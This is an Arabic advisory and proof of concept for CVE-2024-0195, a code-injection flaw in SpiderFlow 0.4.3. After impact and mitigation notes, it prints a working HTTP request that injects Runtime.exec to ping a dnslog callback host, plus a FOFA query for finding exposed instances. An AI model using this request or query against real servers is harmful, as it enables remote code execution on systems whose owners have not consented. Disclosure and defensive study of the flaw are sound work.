
إثبات مفهوم لاستغلال CVE-2024-0195، وهي ثغرة حقن كود حرجة في SpiderFlow 0.4.3 تمكن من تنفيذ كود عن بُعد عبر نقطة النهاية FunctionService.saveFunction.
CVE-2024-0195 هي ثغرة حقن كود حرجة في تطبيق الويب spider-flow 0.4.3، وتحديداً في دالة FunctionService.saveFunction في ملف FunctionController.java. يمكن للمهاجم حقن كود خبيث عن بُعد يتم تنفيذه على الخادم. وهذا يسمح بالاختراق الكامل للتطبيق.
هذه الثغرة شديدة الخطورة لأنها تسمح بتنفيذ الأكواد عن بُعد على الخادم الذي يستضيف تطبيق spider-flow المعرض للخطر. يمكن للمهاجم اختراق الخادم بالكامل، وسرقة البيانات الحساسة، وتثبيت البرامج الضارة أو عمال منجم العملات الرقمية، واستخدامه لمزيد من الهجمات داخل الشبكة. تتأثر سرية وسلامة وتوفر التطبيق والخادم بشكل خطير.
لم يتم ذكر إصدار مصحح بشكل صريح، لذلك يبدو أن التصحيح ليس خيارًا متاحًا حاليًا. تم الكشف عن الثغرة بشكل عام وتتوفر استغلالاتها، لذا فإن التخفيف الفوري أمر بالغ الأهمية.
حتى يتم إصدار تصحيح رسمي، يجب إخراج spider-flow 0.4.3 من الخدمة فورًا أو تقييد الوصول إلى الشبكات/المستخدمين الموثوقين فقط. يمكن تهيئة جدران الحماية لتطبيقات الويب أو ضوابط التحقق من الإدخال الأخرى لاكتشاف ومنع محاولات هجمات حقن الكود كإجراء تخفيف مؤقت. ومع ذلك، هذه ليست حلولًا كاملة، ويجب ترقية الإصدار المعرض للخطر بمجرد توفر إصدار مُصلح.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ إثبات المفهوم
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B